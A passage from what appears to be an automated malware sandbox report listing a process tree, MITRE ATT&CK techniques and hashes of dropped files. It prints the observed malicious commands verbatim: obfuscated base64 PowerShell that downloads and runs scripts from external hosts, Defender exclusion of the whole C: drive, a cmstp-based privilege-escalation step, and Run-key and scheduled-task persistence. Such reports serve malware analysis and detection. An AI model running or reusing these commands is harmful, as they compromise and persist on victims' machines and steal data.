icWR5dW9ncXRncXVtdGxzdXhwZnVuZGVtdmFtbSAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRpdWl5YmZzY2treWJhemxsdWx4eGJ5YWdsa29ia3NwY2dmblsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtzY3dsbmhyd3R1ZHJmb3lmY2Vpa2FsbGJ6dHd6YndleXhzayAka2d4dmd1enh5YXNuYmN5cHNub29qdGNucnJxcnN2dnV2bWIgJG51bGw7c2N3bG5ocnd0dWRyZm95ZmNlaWthbGxienR3emJ3ZXl4c2sgJGV3cHFjYmJjZnR3bnltZHdwc3FkcWVrZXBkaGVjZXhzb2J0ICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
                                                                    4⤵
                                                                    • Blocklisted process makes network request
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Accesses Microsoft Outlook profiles
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • outlook_office_path
                                                                    • outlook_win_path
                                                                    PID:5184
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
                                                              1⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Drops file in System32 directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:7188
                                                            • C:\Windows\system32\taskkill.exe
                                                              taskkill /IM cmstp.exe /F
                                                              1⤵
                                                              • Kills process with taskkill
                                                              PID:6976
                                                            • C:\Windows\System32\WScript.exe
                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\4.vbs"
                                                              1⤵
                                                              • Checks computer location settings
                                                              PID:7076
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
                                                                2⤵
                                                                  PID:7612
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
                                                                    3⤵
                                                                      PID:7132
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
                                                                        4⤵
                                                                        • Blocklisted process makes network request
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:7672
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h54k00hn\h54k00hn.cmdline"
                                                                          5⤵
                                                                            PID:7840
                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C69.tmp" "c:\Users\Admin\AppData\Local\Temp\h54k00hn\CSC57334757BFA7412186CD6D50A898FA8.TMP"
                                                                              6⤵
                                                                                PID:7876
                                                                            • C:\windows\system32\cmstp.exe
                                                                              "C:\windows\system32\cmstp.exe" /au C:\windows\temp\eqwwquif.inf
                                                                              5⤵
                                                                                PID:7928
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
                                                                              4⤵
                                                                              • Adds Run key to start application
                                                                              PID:5512
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gbW9jcW5xaWtkZXZ3bm94amp1Z29seHh1YnJwaG5pcWZtaHpkeXNvZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1U2a0N0bnR6QTB2ZkwxQmhkZ2lHNWZTb1NjckcxQmVuMXhIOVlYeUExbkk9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCd3S0hDbDVKSWZtWFVxdmRmNG8zRXZ3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGVuYWN5ZGd0Z2tmdmp5bW9xaXB3YWJ4dW9wamZvdGtyZ2FqeXd2dnkoJHBhcmFtX3Zhcil7CUlFWCAnJGt3YWRkdndvdmtucWNzZmRwZ29qdGFmbXo9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckbnBqb25zdm1ybGVhdHJ0dHZrZGd1cG52Zz1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGlxaG1lanJvZHBnbnpoc3JkbGdiZHdwdXA9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygka3dhZGR2d292a25xY3NmZHBnb2p0YWZteiwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkaXFobWVqcm9kcGduemhzcmRsZ2Jkd3B1cC5Db3B5VG8oJG5wam9uc3ZtcmxlYXRydHR2a2RndXBudmcpOwkkaXFobWVqcm9kcGduemhzcmRsZ2Jkd3B1cC5EaXNwb3NlKCk7CSRrd2FkZHZ3b3ZrbnFjc2ZkcGdvanRhZm16LkRpc3Bvc2UoKTsJJG5wam9uc3ZtcmxlYXRydHR2a2RndXBudmcuRGlzcG9zZSgpOwkkbnBqb25zdm1ybGVhdHJ0dHZrZGd1cG52Zy5Ub0FycmF5KCk7fWZ1bmN0aW9uIGpiZm9hbHhsaHhndmFmbHJiamN3bnllaHV6dWhldG9xcW54KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckeXFiZ2V5Ym5pZmJvYW5ibW1wYm1ndmNrcHFlZ3VkbGJtd2Z0cGl6cj1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGV6cWJyZGR4Zm9xZ25pamRucXJvdXV0ZnRhY2RoaXdlcWppZ2VhdGxuZ2JnbWZuZW1jPSR5cWJnZXlibmlmYm9hbmJtbXBibWd2Y2twcWVndWRsYm13ZnRwaXpyLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGV6cWJyZGR4Zm9xZ25pamRucXJvdXV0ZnRhY2RoaXdlcWppZ2VhdGxuZ2JnbWZuZW1jLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kc3pxaW1zY3lob2dsbWtvdGxxdXNpdGZvdSA9ICRlbnY6VVNFUk5BTUU7JGh0Z3h1YXJtdGtibGN2ZnpxaXp0dmRidnIgPSAnQzpcVXNlcnNcJyArICRzenFpbXNjeWhvZ2xta290bHF1c2l0Zm91ICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaHRneHVhcm10a2JsY3ZmenFpenR2ZGJ2cjskZ2NodGs9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRodGd4dWFybXRrYmxjdmZ6cWl6dHZkYnZyKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeGt0IGluICRnY2h0aykgewlpZiAoJHhrdC5TdGFydHNXaXRoKCc6OicpKQl7CQkkZXJrZm89JHhrdC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kc255cmdodnF0dWJrbmFlaHRreXJodGh0Z2JuZ2FodXFybnk9W3N0cmluZ1tdXSRlcmtmby5TcGxpdCgnXCcpO0lFWCAnJHR6ZGZmZ21memFjdHpua3pneGF2emZma2Z1b3BtemtzYWNrPWVuYWN5ZGd0Z2tmdmp5bW9xaXB3YWJ4dW9wamZvdGtyZ2FqeXd2dnkgKG1vY3FucWlrZGV2d25veGpqdWdvbHh4dWJycGhuaXFmbWh6ZHlzb2YgKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkc255cmdodnF0dWJrbmFlaHRreXJodGh0Z2JuZ2FodXFybnlbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckaXFlc2x2bmh0ZGhuc3BobnRycnpvdXNhbHJ3dGFwa3R4Y2M9ZW5hY3lkZ3Rna2Z2anltb3FpcHdhYnh1b3BqZm90a3JnYWp5d3Z2eSAobW9jcW5xaWtkZXZ3bm94amp1Z29seHh1YnJwaG5pcWZtaHpkeXNvZiAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRzbnlyZ2h2cXR1YmtuYWVodGt5cmh0aHRnYm5nYWh1cXJueVsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtqYmZvYWx4bGh4Z3ZhZmxyYmpjd255ZWh1enVoZXRvcXFueCAkdHpkZmZnbWZ6YWN0em5remd4YXZ6ZmZrZnVvcG16a3NhY2sgJG51bGw7amJmb2FseGxoeGd2YWZscmJqY3dueWVodXp1aGV0b3FxbnggJGlxZXNsdm5odGRobnNwaG50cnJ6b3VzYWxyd3RhcGt0eGNjICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
                                                                              4⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in Program Files directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:5616
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                "schtasks" /create /tn "google" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:5588
                                                                              • C:\Program Files (x86)\googlecmd\google.exe
                                                                                "C:\Program Files (x86)\googlecmd\google.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:7024
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
                                                                        1⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Drops file in System32 directory
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:7960
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /IM cmstp.exe /F
                                                                        1⤵
                                                                        • Kills process with taskkill
                                                                        PID:8100
                                                                      • C:\Windows\System32\notepad.exe
                                                                        "C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\abc.ps1"
                                                                        1⤵
                                                                        • Opens file in notepad (likely ransom note)
                                                                        PID:7880
                                                                      • C:\Windows\System32\rundll32.exe
                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                        1⤵
                                                                          PID:8072
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\Downloads\abc.ps1'"
                                                                          1⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:8100
                                                                        • C:\Windows\system32\taskmgr.exe
                                                                          "C:\Windows\system32\taskmgr.exe" /0
                                                                          1⤵
                                                                          • Checks SCSI registry key(s)
                                                                          • Checks processor information in registry
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:2160
                                                                        • C:\Windows\System32\NOTEPAD.EXE
                                                                          "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\c.bat
                                                                          1⤵
                                                                          • Opens file in notepad (likely ransom note)
                                                                          PID:7956
                                                                        • C:\Windows\System32\NOTEPAD.EXE
                                                                          "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\WordDoc.bat
                                                                          1⤵
                                                                          • Opens file in notepad (likely ransom note)
                                                                          PID:5496
                                                                        • C:\Program Files\7-Zip\7zFM.exe
                                                                          "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\tmpaddon-1"
                                                                          1⤵
                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                          PID:7616
                                                                        • C:\Program Files\7-Zip\7zFM.exe
                                                                          "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\tmpaddon"
                                                                          1⤵
                                                                            PID:6960

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Reconnaissance

                                                                          Resource Development

                                                                          Initial Access

                                                                          Execution

                                                                          Command and Scripting Interpreter

                                                                          1
                                                                          T1059

                                                                          PowerShell

                                                                          1
                                                                          T1059.001

                                                                          Scheduled Task/Job

                                                                          1
                                                                          T1053

                                                                          Scheduled Task

                                                                          1
                                                                          T1053.005

                                                                          Persistence

                                                                          Boot or Logon Autostart Execution

                                                                          1
                                                                          T1547

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1547.001

                                                                          Scheduled Task/Job

                                                                          1
                                                                          T1053

                                                                          Scheduled Task

                                                                          1
                                                                          T1053.005

                                                                          Privilege Escalation

                                                                          Boot or Logon Autostart Execution

                                                                          1
                                                                          T1547

                                                                          Registry Run Keys / Startup Folder

                                                                          1
                                                                          T1547.001

                                                                          Scheduled Task/Job

                                                                          1
                                                                          T1053

                                                                          Scheduled Task

                                                                          1
                                                                          T1053.005

                                                                          Defense Evasion

                                                                          Modify Registry

                                                                          1
                                                                          T1112

                                                                          Credential Access

                                                                          Discovery

                                                                          Peripheral Device Discovery

                                                                          1
                                                                          T1120

                                                                          Query Registry

                                                                          4
                                                                          T1012

                                                                          System Information Discovery

                                                                          4
                                                                          T1082

                                                                          System Location Discovery

                                                                          1
                                                                          T1614

                                                                          System Language Discovery

                                                                          1
                                                                          T1614.001

                                                                          Lateral Movement

                                                                          Collection

                                                                          Email Collection

                                                                          1
                                                                          T1114

                                                                          Command and Control

                                                                          Web Service

                                                                          1
                                                                          T1102

                                                                          Exfiltration

                                                                          Impact

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Program Files (x86)\googlecmd\google.exe
                                                                            Filesize

                                                                            425KB

                                                                            MD5

                                                                            6bb54b2d7a3d63578559239a79700ea3

                                                                            SHA1

                                                                            bc8d22b16e9ab2045c3acfb8ff1c0ce97bd9936a

                                                                            SHA256

                                                                            870eda04ea71cc066ec907f005e1d05ce592f04799c60e600e2cb986dc85b5eb

                                                                            SHA512

                                                                            5eb2369b6d5cf615d9ef49315ef2278db7cf9a9fe2deb3c2568ff114d51dbd1a9ca4e4ab696e0bf6e2c5d9e3e2c84c706cd550824f3b45b3f7df1690503a4614

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                            Filesize

                                                                            3KB

                                                                            MD5

                                                                            b9cd68b5f314b5190f27a211d3506df0

                                                                            SHA1

                                                                            60c891d9a3c857fda4b75576420a54d38054c544

                                                                            SHA256

                                                                            8908f5cb47ad8627c2af37f08e4f42734cb8dd761734d27fb7745ca522e0018e

                                                                            SHA512

                                                                            1565a76680cf17ec9426dacab318124ff6374243e19550616069cd1a6149f356bb6f90ea524fbddce2082631be85831d5cb3a118d53c2c15c82096100b5b6182

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                            Filesize

                                                                            54KB

                                                                            MD5

                                                                            eb46a876d5214ebb197fc7a519a22764

                                                                            SHA1

                                                                            08f57532bbe4c64e174206904527f2f64d9be2aa

                                                                            SHA256

                                                                            247d6cd4981f7da2dfef233f349dc7ec2a3fcd7e40eb605bc9a0f8fd79f96f09

                                                                            SHA512

                                                                            035ca8ea5238842596862c99c788e009fea0db8be2d4ba6ba089d4de5273ceba5a7da3472c0387398bb45a1e2a02e32ab77841f88664d0a8b5727311cb699484

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                            Filesize

                                                                            53KB

                                                                            MD5

                                                                            53e890846328f16c62aeed7c193b6048

                                                                            SHA1

                                                                            cc557e045a19157b2f8db4895ef9da45a75c403c

                                                                            SHA256

                                                                            fb236733a0808d059bf2c753eeb6c78e819be8fb76d9c8ac3fb75c4801281ebe

                                                                            SHA512

                                                                            e8b99e62f3a2a01cf0539064e1a633c7da6ae0a5423c66089765e2487d1b5c4764c348f68fee4cf7d3ba0984f26c15f71b723aeb94aad0662ab0c4e6c4c184aa

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            825491354be45ebc5bd166c48391c92c

                                                                            SHA1

                                                                            7c877220a502ae84d949f340c87271613233c1b6

                                                                            SHA256

                                                                            6cb0f6de8121adb73b16d3e24693226583e915ced62733d8e021e74bf845dcd8

                                                                            SHA512

                                                                            3844e7483d48f637acf70a66ff2fde0b7a994e8705204a843941e402aca7c2356190ac43130937444a50199fe732a341a58f0c1d238cf6f37d87ed1e4dec2775

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            91f264a58a69d5dbe8d2a08b7515d567

                                                                            SHA1

                                                                            f34cb5b682844d3eeea7153aa82386b9808b79e5

                                                                            SHA256

                                                                            8e66fd3c754aa5d5294992e4439d9757b8b32855b949f6a70ca167964774d0bd

                                                                            SHA512

                                                                            7d42c0008cff4c893ebd23f12d1e34ac910473b3a205b419c35792e1457a31d574a879209c2b64d4b2fd838a77e4dd3d5708f22204c39a2f1ab9fe3a38020086

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            22bd4d569ae9dc62e8d84a9a7886cab9

                                                                            SHA1

                                                                            1b5a8166ab086efcf6c2c591c0bb87911c79baeb

                                                                            SHA256

                                                                            f36e70a70e760222aadff316f170c1aeebc116fd16fb465e03098ef2de7b7812

                                                                            SHA512

                                                                            e80856d3b5058ede1adf560950d3572f9d62df8625f2a0b7a91e6a2db54a660b8e18fe768cac648e5844462d458942f0bea5f4edb27b5b3073de42740f5a64f0

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            39ad01207ab66ca033816b2ad1adbb9e

                                                                            SHA1

                                                                            0fc7a5bba6583a49e22587f43013fa17bab612e3

                                                                            SHA256

                                                                            47fc0e0ca67b16f3b165a4ac3b5bb899c65e693ea3f604e4f4d9b64ac0300c11

                                                                            SHA512

                                                                            5efbb3c7cccdf3233bb42e214d09b56df7d5c7f3178b0f5cf1ac90a609a381d201d826cd3cda8d17e10bbcb4207a0563bfcad72ac2564fdc62383588e77f493b

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\e5fc29jx.default-release\activity-stream.discovery_stream.json.tmp
                                                                            Filesize

                                                                            22KB

                                                                            MD5

                                                                            3fafaec5962f405bcec4155449d51f4e

                                                                            SHA1

                                                                            9f768c9cda28d58d8315ad3fe7e24e5c74b1d846

                                                                            SHA256

                                                                            0a211c0dbc3bc9cc0deb2b596e6d888a53218689db54f5afd6a1f866e512120e

                                                                            SHA512

                                                                            e17fa1efcf61ac6b91b2c71e603a5b3be6e35568008e1f39c0bc7373c47236b2429c09e2658e256901ca48cdd74902bf806561aad96e9abef3686e0d278be8e1

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\1erceo3g\1erceo3g.dll
                                                                            Filesize

                                                                            4KB

                                                                            MD5

                                                                            8374eeb219340fdb534f95f7251db434

                                                                            SHA1

                                                                            a93918a6d79c4fac8a809bb85dfb95c7f1ffa714

                                                                            SHA256

                                                                            18dbfce70699364530dd008c17660e7710138e0366bb53c6a3e1175f61bf4ebd

                                                                            SHA512

                                                                            f62dc1852a7e95d201f3b968142fc84444cf2d9ae910e8db1ad2a764b68ebf677e0dc327fc511899dfeae6c080363ff9ac0674291c6a4cbccaa5f226d0af3a91

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\RES184A.tmp
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            f74d3eccec99c743e3938835b4f1e7d9

                                                                            SHA1

                                                                            467e1593f66b760241cd78bfc49311c1ac146c6f

                                                                            SHA256

                                                                            7968f3076b9eabac8db8e70084dbcb26c7189d76dc1b8eb402981fc15e7f7e6c

                                                                            SHA512

                                                                            bc417e8871f1d02352e86655cb76c04134c6f32e0ab35e6901d49d33c74e302b30f3bc0d2c746733bcad15ffe1972fcdd77bc9149e5c0fb29238d0132c4a7308

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\RES24E8.tmp
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            e09bbf8d07304fb4e1ed87cd9115513d

                                                                            SHA1

                                                                            1af0f4658978ede7130dfcf466e84a7499f43387

                                                                            SHA256

                                                                            7e3a6aa842393ee403f594cc80d62672a1ce0bb22ce03f9b33e313c1861c2155

                                                                            SHA512

                                                                            f3ad079324bc07bc56fe3d7ac98d69e515a2b824ea7657a59975f6c34f9ac4ee104eb4bc474859b66e38e66370046c145d07c992dc386ee5610044c74defeb3f

                                                                            Download Submit

                                                                          • C:\Users\Admin\AppData\Local\Temp\RES9C69.tmp
                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            f2fc37952fd278a98f2c3b0026657c6a

                                                                            SHA1

                                                                            159c1e4fd4f583a75ef77c693d2fa7ce9ce8cd8c

                                                                            SHA256

                                                                            6f3a703ae5a59fb08a843ee838ae0290cad1778c05fea3123da4867272c8f4e9

                                                                            SHA512

